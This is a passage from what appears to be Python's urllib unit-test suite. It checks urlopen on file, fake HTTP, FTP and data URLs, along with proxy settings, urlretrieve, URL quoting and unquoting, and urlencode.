self.text = bytes("test_urllib: %s\n" % self.__class__.__name__,
"ascii")
f = open(support.TESTFN, 'wb')
try:
f.write(self.text)
finally:
f.close()
self.pathname = support.TESTFN
self.returned_obj = urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual(b'', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it here and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), email.message.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertIsNone(self.returned_obj.getcode())
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison.
# Use the iterator in the usual implicit way to test for ticket #4608.
for line in self.returned_obj:
self.assertEqual(line, self.text)
def test_relativelocalfile(self):
self.assertRaises(ValueError,urllib.request.urlopen,'./' + self.pathname)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in list(os.environ):
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.request.getproxies_environment()
        # getproxies_environment() uses lowercased, truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
# List of no_proxies with space.
self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com')
self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com'))
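# For reference (informational comment): with NO_PROXY='localhost',
# getproxies_environment() returns {'no': 'localhost'}; once NO_PROXY is
# extended to the comma-separated list above,
# proxy_bypass_environment('anotherdomain.com') is true because that host
# appears in the list.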
class urlopen_HttpTests(unittest.TestCase, FakeHTTPMixin, FakeFTPMixin):
"""Test urlopen() opening a fake http connection."""
def check_read(self, ver):
self.fakehttp(b"HTTP/" + ver + b" 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
fp = urllib.request.urlopen(url)
self.assertEqual(fp.geturl(), url)
finally:
self.unfakehttp()
def test_willclose(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
resp = urlopen("http://www.python.org")
self.assertTrue(resp.fp.will_close)
finally:
self.unfakehttp()
def test_read_0_9(self):
# "0.9" response accepted (but not "simple responses" without
# a status line)
self.check_read(b"0.9")
def test_read_1_0(self):
self.check_read(b"1.0")
def test_read_1_1(self):
self.check_read(b"1.1")
def test_read_bogus(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(OSError, urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_invalid_redirect(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file://guidocomputer.athome.com:/python/license
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(urllib.error.HTTPError, urlopen,
"http://python.org/")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises OSError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp(b'')
try:
self.assertRaises(OSError, urlopen, "http://something")
finally:
self.unfakehttp()
def test_missing_localfile(self):
# Test for #10836
with self.assertRaises(urllib.error.URLError) as e:
urlopen('file://localhost/a/file/which/doesnot/exists.py')
self.assertTrue(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_file_notexists(self):
fd, tmp_file = tempfile.mkstemp()
tmp_fileurl = 'file://localhost/' + tmp_file.replace(os.path.sep, '/')
try:
self.assertTrue(os.path.exists(tmp_file))
with urlopen(tmp_fileurl) as fobj:
self.assertTrue(fobj)
finally:
os.close(fd)
os.unlink(tmp_file)
self.assertFalse(os.path.exists(tmp_file))
with self.assertRaises(urllib.error.URLError):
urlopen(tmp_fileurl)
def test_ftp_nohost(self):
test_ftp_url = 'ftp:///path'
with self.assertRaises(urllib.error.URLError) as e:
urlopen(test_ftp_url)
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_ftp_nonexisting(self):
with self.assertRaises(urllib.error.URLError) as e:
urlopen('ftp://localhost/a/file/which/doesnot/exists.py')
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
@patch.object(urllib.request, 'MAXFTPCACHE', 0)
def test_ftp_cache_pruning(self):
self.fakeftp()
try:
urllib.request.ftpcache['test'] = urllib.request.ftpwrapper('user', 'pass', 'localhost', 21, [])
urlopen('ftp://localhost')
finally:
self.unfakeftp()
def test_userpass_inurl(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://user:pass@python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://user:pass@python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_userpass_inurl_w_spaces(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
userpass = "a b:c d"
url = "http://{}@python.org/".format(userpass)
fakehttp_wrapper = http.client.HTTPConnection
authorization = ("Authorization: Basic %s\r\n" %
b64encode(userpass.encode("ASCII")).decode("ASCII"))
fp = urlopen(url)
# The authorization header must be in place
self.assertIn(authorization, fakehttp_wrapper.buf.decode("UTF-8"))
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
# the spaces are quoted in URL so no match
self.assertNotEqual(fp.geturl(), url)
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_URLopener_deprecation(self):
with support.check_warnings(('',DeprecationWarning)):
urllib.request.URLopener()
@unittest.skipUnless(ssl, "ssl module required")
def test_cafile_and_context(self):
context = ssl.create_default_context()
with self.assertRaises(ValueError):
urllib.request.urlopen(
"https://localhost", cafile="/nonexistent/path", context=context
)
class urlopen_DataTests(unittest.TestCase):
"""Test urlopen() opening a data URL."""
def setUp(self):
# text containing URL special- and unicode-characters
self.text = "test data URLs :;,%=& \u00f6 \u00c4 "
# 2x1 pixel RGB PNG image with one black and one white pixel
self.image = (
b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x02\x00\x00\x00'
b'\x01\x08\x02\x00\x00\x00{@\xe8\xdd\x00\x00\x00\x01sRGB\x00\xae'
b'\xce\x1c\xe9\x00\x00\x00\x0fIDAT\x08\xd7c```\xf8\xff\xff?\x00'
b'\x06\x01\x02\xfe\no/\x1e\x00\x00\x00\x00IEND\xaeB`\x82')
self.text_url = (
"data:text/plain;charset=UTF-8,test%20data%20URLs%20%3A%3B%2C%25%3"
"D%26%20%C3%B6%20%C3%84%20")
self.text_url_base64 = (
"data:text/plain;charset=ISO-8859-1;base64,dGVzdCBkYXRhIFVSTHMgOjs"
"sJT0mIPYgxCA%3D")
# base64 encoded data URL that contains ignorable spaces,
# such as "\n", " ", "%0A", and "%20".
self.image_url = (
"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAIAAAABCAIAAAB7\n"
"QOjdAAAAAXNSR0IArs4c6QAAAA9JREFUCNdj%0AYGBg%2BP//PwAGAQL%2BCm8 "
"vHgAAAABJRU5ErkJggg%3D%3D%0A%20")
self.text_url_resp = urllib.request.urlopen(self.text_url)
self.text_url_base64_resp = urllib.request.urlopen(
self.text_url_base64)
self.image_url_resp = urllib.request.urlopen(self.image_url)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.text_url_resp, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_info(self):
self.assertIsInstance(self.text_url_resp.info(), email.message.Message)
self.assertEqual(self.text_url_base64_resp.info().get_params(),
[('text/plain', ''), ('charset', 'ISO-8859-1')])
self.assertEqual(self.image_url_resp.info()['content-length'],
str(len(self.image)))
self.assertEqual(urllib.request.urlopen("data:,").info().get_params(),
[('text/plain', ''), ('charset', 'US-ASCII')])
def test_geturl(self):
self.assertEqual(self.text_url_resp.geturl(), self.text_url)
self.assertEqual(self.text_url_base64_resp.geturl(),
self.text_url_base64)
self.assertEqual(self.image_url_resp.geturl(), self.image_url)
def test_read_text(self):
self.assertEqual(self.text_url_resp.read().decode(
dict(self.text_url_resp.info().get_params())['charset']), self.text)
def test_read_text_base64(self):
self.assertEqual(self.text_url_base64_resp.read().decode(
dict(self.text_url_base64_resp.info().get_params())['charset']),
self.text)
def test_read_image(self):
self.assertEqual(self.image_url_resp.read(), self.image)
def test_missing_comma(self):
self.assertRaises(ValueError,urllib.request.urlopen,'data:text/plain')
def test_invalid_base64_data(self):
# missing padding character
self.assertRaises(ValueError,urllib.request.urlopen,'data:;base64,Cg=')
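# Illustrative sketch (not itself a test): the decoding exercised above can be
# reproduced directly, e.g.
#   urllib.request.urlopen("data:,Hello%2C%20World%21").read()
# returns b'Hello, World!' -- percent-escapes are decoded and, for base64
# data URLs, whitespace inside the payload is ignored.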
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
        # this only helps to make sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(support.TESTFN)
self.text = b'testing urllib.urlretrieve'
try:
FILE = open(support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
filePath = os.path.abspath(filePath)
try:
filePath.encode("utf-8")
except UnicodeEncodeError:
raise unittest.SkipTest("filePath is not encodable to utf8")
return "file://%s" % urllib.request.pathname2url(filePath)
def createNewTempFile(self, data=b""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.request.urlretrieve("file:%s" % support.TESTFN)
self.assertEqual(result[0], support.TESTFN)
self.assertIsInstance(result[1], email.message.Message,
"did not get a email.message.Message instance "
"as second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.request.urlretrieve(self.constructLocalFileUrl(
support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = open(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(block_count, block_read_size, file_size, count_holder=[0]):
self.assertIsInstance(block_count, int)
self.assertIsInstance(block_read_size, int)
self.assertIsInstance(file_size, int)
self.assertEqual(block_count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.request.urlretrieve(
self.constructLocalFileUrl(support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile()
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 5)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][2], 5)
self.assertEqual(report[1][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 8193)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][2], 8193)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[1][1], 8192)
self.assertEqual(report[2][1], 8192)
class urlretrieve_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urllib.urlretrieve() using fake http connections"""
def test_short_content_raises_ContentTooShortError(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
def _reporthook(par1, par2, par3):
pass
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve('http://example.com/',
reporthook=_reporthook)
finally:
self.unfakehttp()
def test_short_content_raises_ContentTooShortError_without_reporthook(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve('http://example.com/')
finally:
self.unfakehttp()
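# Background for the two tests above: urlretrieve() compares the advertised
# Content-Length (100 bytes in the fake responses) with the number of bytes
# actually received and raises ContentTooShortError when the body falls
# short, whether or not a reporthook is supplied.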
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 (Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>.
The Python code of ``'%' + hex(ord(<character>))[2:]`` escapes a
character properly. Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
        # Make sure quote() does not quote letters, digits, and "_.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.parse.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %r != %r" % (do_not_quote, result))
result = urllib.parse.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %r != %r" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.parse.quote.__defaults__[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.parse.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
result = urllib.parse.quote_plus(quote_by_default,
safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %r != %r" %
(quote_by_default, result))
# Safe expressed as bytes rather than str
result = urllib.parse.quote(quote_by_default, safe=b"<>")
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
# "Safe" non-ASCII characters should have no effect
# (Since URIs are not allowed to have non-ASCII characters)
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
# Same as above, but using a bytes rather than str
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe=b"\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.parse.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): "
"%s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.parse.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.parse.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %r != %r" % (expected, result))
result = urllib.parse.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %r != %r" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.parse.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %r != %r" % (result, hexescape(' ')))
result = urllib.parse.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %r != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.parse.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
# Test with bytes
self.assertEqual(urllib.parse.quote_plus(b'alpha+beta gamma'),
'alpha%2Bbeta+gamma')
# Test with safe bytes
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', b'+'),
'alpha+beta+gamma')
def test_quote_bytes(self):
# Bytes should quote directly to percent-encoded values
given = b"\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Encoding argument should raise type error on bytes input
self.assertRaises(TypeError, urllib.parse.quote, given,
encoding="latin-1")
# quote_from_bytes should work the same
result = urllib.parse.quote_from_bytes(given)
self.assertEqual(expect, result,
"using quote_from_bytes(): %r != %r"
% (expect, result))
def test_quote_with_unicode(self):
# Characters in Latin-1 range, encoded by default in UTF-8
given = "\xa2\xd8ab\xff"
expect = "%C2%A2%C3%98ab%C3%BF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
        # Characters in Latin-1 range, encoded with None (default)
result = urllib.parse.quote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded with Latin-1
given = "\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded by default in UTF-8
given = "\u6f22\u5b57" # "Kanji"
expect = "%E6%BC%A2%E5%AD%97"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with Latin-1
given = "\u6f22\u5b57"
self.assertRaises(UnicodeEncodeError, urllib.parse.quote, given,
encoding="latin-1")
# Characters in BMP, encoded with Latin-1, with replace error handling
given = "\u6f22\u5b57"
expect = "%3F%3F" # "??"
result = urllib.parse.quote(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, Latin-1, with xmlcharref error handling
given = "\u6f22\u5b57"
expect = "%26%2328450%3B%26%2323383%3B" # "漢字"
result = urllib.parse.quote(given, encoding="latin-1",
errors="xmlcharrefreplace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
def test_quote_plus_with_unicode(self):
# Encoding (latin-1) test for quote_plus
given = "\xa2\xd8 \xff"
expect = "%A2%D8+%FF"
result = urllib.parse.quote_plus(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
# Errors test for quote_plus
given = "ab\u6f22\u5b57 cd"
expect = "ab%3F%3F+cd"
result = urllib.parse.quote_plus(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for quoting_Tests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.parse.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, ())
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, b'')
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
# unquote_to_bytes
given = '%xab'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%x'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, ())
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = b'\xab\xea'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquote_to_bytes(self):
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = b'br\xc3\xbcckner_sapporo_20050930.doc'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test on a string with unescaped non-ASCII characters
# (Technically an invalid URI; expect those characters to be UTF-8
# encoded).
result = urllib.parse.unquote_to_bytes("\u6f22%C3%BC")
expect = b'\xe6\xbc\xa2\xc3\xbc' # UTF-8 for "\u6f22\u00fc"
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input
given = b'%A2%D8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input, with unescaped non-ASCII bytes
# (Technically an invalid URI; expect those bytes to be preserved)
given = b'%A2\xd8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquote_with_unicode(self):
# Characters in the Latin-1 range, encoded with UTF-8
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = 'br\u00fcckner_sapporo_20050930.doc'
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with None (default)
result = urllib.parse.unquote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with Latin-1
result = urllib.parse.unquote('br%FCckner_sapporo_20050930.doc',
encoding="latin-1")
expect = 'br\u00fcckner_sapporo_20050930.doc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with UTF-8
given = "%E6%BC%A2%E5%AD%97"
expect = "\u6f22\u5b57" # "Kanji"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence
given = "%F3%B1"
expect = "\ufffd" # Replacement character
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, replace errors
result = urllib.parse.unquote(given, errors="replace")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, ignoring errors
given = "%F3%B1"
expect = ""
result = urllib.parse.unquote(given, errors="ignore")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, UTF-8
result = urllib.parse.unquote("\u6f22%C3%BC")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, Latin-1
# (Note, the string contains non-Latin-1-representable characters)
result = urllib.parse.unquote("\u6f22%FC", encoding="latin-1")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
        The test cannot assume anything about ordering: the docs make no
        guarantee, and the input may be a dictionary.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.parse.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
